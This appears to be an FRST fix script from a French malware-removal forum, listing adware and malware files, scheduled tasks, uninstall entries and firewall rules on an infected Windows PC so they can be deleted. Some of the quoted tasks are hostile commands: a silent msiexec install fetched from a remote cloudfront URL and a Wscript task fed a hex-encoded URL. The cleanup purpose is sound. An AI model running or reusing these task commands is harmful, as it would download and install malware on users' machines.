2017-02-20 02:41 - 2017-02-20 02:41 - 00000000 ____D C:\Users\shagu\AppData\Local\UCBrowser
2017-02-20 02:39 - 2017-02-20 02:42 - 00000000 ____D C:\Program Files (x86)\UCBrowser
2017-02-20 02:35 - 2017-02-20 02:35 - 00326144 _____ C:\ProgramData\smp2.exe
2017-02-20 02:35 - 2017-02-20 02:35 - 00000000 ____D C:\ProgramData\Voyasollams
2017-02-20 02:34 - 2017-02-20 07:34 - 00000000 ____D C:\ProgramData\Voyasollam
2017-02-20 02:34 - 2017-02-20 02:39 - 07319040 _____ C:\Users\shagu\AppData\Roaming\agent.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 00126464 _____ C:\Users\shagu\AppData\Roaming\noah.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 7319040 _____ () C:\Users\shagu\AppData\Roaming\agent.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 7319040 _____ () C:\Users\shagu\AppData\Roaming\agent.dat
2017-02-20 02:34 - 2017-02-20 02:39 - 0126464 _____ () C:\Users\shagu\AppData\Roaming\noah.dat
2017-02-20 02:35 - 2017-02-20 02:35 - 0326144 _____ () C:\ProgramData\smp2.exe
C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe
C:\Program Files (x86)\gamesdesktop\DVWUF19X4UB11HX.exe
C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe
C:\ProgramData\smp2.exe
2017-02-20 03:21 - 2017-02-20 03:21 - 0065536 _____ (E76YALI) C:\Users\shagu\AppData\Local\Temp\4Al4PnQuYPrUqr3FFgkc.exe
2017-02-20 03:30 - 2017-02-20 03:30 - 0065536 _____ (E76YALI) C:\Users\shagu\AppData\Local\Temp\y0srZX2r7Mrm7n42SUjN.exe
Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ATTENTION
Social2Search (HKLM\...\03735a5bef674249792b91c3a0317af8) (Version: 11.13.1.5 (i1.0) - Social2Search) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{3B955E2B-4C53-49DA-ABF9-8C884B5EA772}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{77034FCD-A5D0-4EA1-9C64-6D2ADDF608BD}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{7C766E42-DFB3-41C3-9650-7242B97517F9}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{84A0EA8D-1024-4FDC-94E5-EC620506B282}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{85B1E79A-BAB3-4929-8258-76F17D30ED66}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{8A88C0D4-73E0-46EE-BE7C-47B1266715AB}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{A75E8E41-9361-4847-B324-6FA4A06F77B2}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{CEF386D9-88A9-4BF6-A938-DAE5E9ED356B}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{DC58D809-847C-4A85-B5AB-0FA0266A58EF}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{FA348C94-E5B4-4B21-8092-025E6C38FEC8}) (Version: - ) <==== ATTENTION
Task: {07A5C145-140B-4602-A1FE-F178CE694315} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-02-20] () <==== ATTENTION
Task: {243B223D-6CD2-49FC-A5A9-454523D6DB38} - System32\Tasks\SMW_UpdateTask_Time_313835383239383434362d454a2a415034412a4a6c575a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {35213736-555C-4C95-A492-7668593AEE67} - System32\Tasks\x6H14o86G1 => C:\Program Files (x86)\y1V1qSd0Rl\updengine.exe [2017-02-18] () <==== ATTENTION
Task: {40A40C13-949A-4AC7-8B4F-578F438D4B28} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {4672810B-27B0-423D-9FA4-43E9FE9EF254} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-01-18] (Byte Technologies LLC) <==== ATTENTION
Task: {A3A85F43-42AF-4513-A8F3-5D832A863B93} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {A8953980-D5DC-4D58-A27E-6D81BF21E534} - System32\Tasks\Clogingfureried => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD3200BPVT-22JJ5T0_WD-WX11E61CJ760CJ760&v=2017220 /q
Task: {BDEE15FE-6942-4231-AE48-E8B202300A43} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-02-20] (UC Web Inc.) <==== ATTENTION
Task: {C487F802-0150-499A-9EEB-5152C7EB74DA} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-01-19] (Reimage®) <==== ATTENTION
Task: {CF040A84-D761-4118-8E6B-042FEC5B8B2B} - System32\Tasks\Yahoo! Powered latom => Wscript.exe "C:\ProgramData\{D39216F1-59D0-9C37-DF16-0275455489BB}\dade.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b44333932313646312d353944302d394333372d444631362d3032373534353534383942427d5c6d65736f6465" "433a5c50726f6772616d446174615c7b44333932313646312d353944302d394333372d444631 (l'élément de données a 78 caractères en plus).
Task: {DC99E15F-D13C-485C-8BA5-610BF83681C8} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2016-11-13] (Reimage ltd.) <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Yahoo! Powered latom.job => Wscript.exe C:\ProgramData\{D39216F1-59D0-9C37-DF16-0275455489BB}\dade.txt <==== ATTENTION
2017-02-20 03:04 - 2017-02-20 07:32 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2017-02-20 03:04 - 2017-02-20 03:04 - 00470592 _____ () C:\WINDOWS\SysWoW64\NetUtils2016.exe
2017-02-20 02:33 - 2017-02-20 03:05 - 00043520 ____N () C:\ProgramData\NetworkPacketManitor\Nettrans.exe
2017-02-20 02:41 - 2017-02-15 12:14 - 00599440 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
2017-02-20 02:34 - 2017-02-20 02:32 - 00982016 _____ () C:\ProgramData\Voyasollam\Voyasollam.exe
2017-02-20 05:58 - 2017-02-20 05:58 - 00304456 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
2017-02-20 05:58 - 2017-02-20 05:58 - 00619848 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
2017-02-15 12:04 - 2017-02-15 12:04 - 01570304 _____ () C:\Users\shagu\AppData\Roaming\gplyra\gplyra.exe
2016-12-22 21:30 - 2016-12-22 21:30 - 00563896 _____ () C:\Users\shagu\AppData\Roaming\cacaoweb\cacaoweb.exe
2017-02-20 02:41 - 2017-02-15 12:14 - 02149136 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
2017-02-20 02:40 - 2017-02-20 02:40 - 00219032 _____ () c:\program files\¿ìñ¹\x86\kuaizipupdatechecker.dll
2016-02-24 09:56 - 2015-12-14 07:05 - 00120832 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\QtSolutions_SOAP-2.7.dll
2016-02-24 09:56 - 2014-04-22 03:14 - 00065536 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\QHttpServer.dll
2016-02-24 09:56 - 2014-05-06 06:39 - 00861184 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\platforms\qwindows.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00021504 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qgif.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00020992 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qico.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00204800 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qjpeg.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00218112 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qmng.dll
2016-02-24 09:56 - 2014-05-06 06:58 - 00015872 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qsvg.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00015360 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qtga.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00307712 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qtiff.dll
2016-02-24 09:56 - 2014-05-06 11:44 - 00014848 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\imageformats\qwbmp.dll
2016-02-24 09:56 - 2014-05-06 07:31 - 00015872 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\sensors\qtsensors_dummy.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00036352 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\bearer\qgenericbearer.dll
2016-02-24 09:56 - 2014-05-06 06:38 - 00038912 _____ () C:\Program Files (x86)\VTech\DownloadManager\System\plugins\bearer\qnativewifibearer.dll
AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [25444]
FirewallRules: [TCP Query User{C1E894D7-21F0-4995-B09A-4E942398BA39}C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe
FirewallRules: [UDP Query User{8E49E8D3-C733-4017-BED2-90250F09218C}C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe] => (Allow) C:\users\shagu\appdata\roaming\cacaoweb\cacaoweb.exe


EmptyTemp:
end

Publicité

Signaler le contenu de ce document

Publicité